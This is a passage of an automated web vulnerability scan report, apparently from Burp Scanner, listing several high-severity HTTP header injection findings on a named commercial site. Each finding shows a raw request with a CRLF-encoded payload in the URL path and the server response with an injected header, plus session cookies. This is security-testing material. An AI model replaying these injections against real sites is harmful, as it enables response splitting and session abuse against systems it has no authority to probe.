Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/fa623
91d1427d552/Rsidepanel_mid-specials.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/fa623 91d1427d552/Rsidepanel_m ...[SNIP]...
1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_mid.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7cffb%0d%0ae67eb0e78d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7cffb%0d%0ae67eb0e78d0/Rsidepanel_mid.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_mid.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/7cffb e67eb0e78d0/Rsidepanel_m ...[SNIP]...
1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/back-front.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3d3b2%0d%0a658a9609ca0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3d3b2%0d%0a658a9609ca0/back-front.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3d3b2
658a9609ca0/back-front.jpg
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/3d3b2 658a9609ca0/back-front.j ...[SNIP]...
1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/banr_techcorner.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 9f5da%0d%0a4c3efec7957 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9f5da%0d%0a4c3efec7957/banr_techcorner.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Location: http://utdi.com/9f5da
4c3efec7957/banr_techcorner.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/9f5da 4c3efec7957/banr_techcor ...[SNIP]...
1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/box-1.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload e96a7%0d%0a0a5e41817ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e96a7%0d%0a0a5e41817ac/box-1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:26 GMT
Server: Apache
Location: http://utdi.com/e96a7
0a5e41817ac/box-1.jpg
Vary: Accept-Encoding
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:19 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/e96a7 0a5e41817ac/box-1.jpg">h ...[SNIP]...
1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/box-enews.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload b64f6%0d%0a348ab3e51c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b64f6%0d%0a348ab3e51c0/box-enews.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/b64f6
348ab3e51c0/box-enews.jpg
Vary: Accept-Encoding
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:16 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/b64f6 348ab3e51c0/box-enews.jp ...[SNIP]...
1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/gpx_avaya_ip500sml.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload fac4e%0d%0ab27292b2e6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fac4e%0d%0ab27292b2e6f/gpx_avaya_ip500sml.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
Location: http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip500sml.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/fac4e b27292b2e6f/gpx_avaya_ip ...[SNIP]...
1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/icon_orangecheckball.gif
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3fb1b%0d%0af3643349a48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3fb1b%0d%0af3643349a48/icon_orangecheckball.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3fb1b
f3643349a48/icon_orangecheckball.gif
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/3fb1b f3643349a48/icon_orangec ...[SNIP]...
1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/logo-cisco-webex-main.gif
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 94032%0d%0afddf97333c8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /94032%0d%0afddf97333c8/logo-cisco-webex-main.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:22 GMT
Server: Apache
Location: http://utdi.com/94032
fddf97333c8/logo-cisco-webex-main.gif
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:14 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/94032 fddf97333c8/logo-cisco-w ...[SNIP]...
1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/logo_carousel.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 5253f%0d%0a9daeaf8bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5253f%0d%0a9daeaf8bf0/logo_carousel.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/5253f
9daeaf8bf0/logo_carousel.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/5253f 9daeaf8bf0/logo_carousel ...[SNIP]...
1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/logo_cisco_footer.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 12683%0d%0a12b8b2e3681 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images12683%0d%0a12b8b2e3681/logo_cisco_footer.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/images12683
12b8b2e3681/logo_cisco_footer.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/images12683 12b8b2e3681/logo_c ...[SNIP]...
1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/logo_nortel4.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 71fda%0d%0a954ff42a597 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /71fda%0d%0a954ff42a597/logo_nortel4.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/71fda
954ff42a597/logo_nortel4.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/71fda 954ff42a597/logo_nortel4 ...[SNIP]...
1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/mainhead_partners.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload f3e47%0d%0a28fa46348f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f3e47%0d%0a28fa46348f5/mainhead_partners.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/f3e47
28fa46348f5/mainhead_partners.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/f3e47 28fa46348f5/mainhead_par ...[SNIP]...
1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/mainhead_smartbuys.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7ccfa%0d%0acc135bb4afe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images7ccfa%0d%0acc135bb4afe/mainhead_smartbuys.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:03 GMT
Server: Apache
Location: http://utdi.com/images7ccfa
cc135bb4afe/mainhead_smartbuys.jpg
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images7ccfa
cc135bb4afe/mainhe ...[SNIP]...
1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/mainpic_blueguy.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload c530b%0d%0ad59940e884 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c530b%0d%0ad59940e884/mainpic_blueguy.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
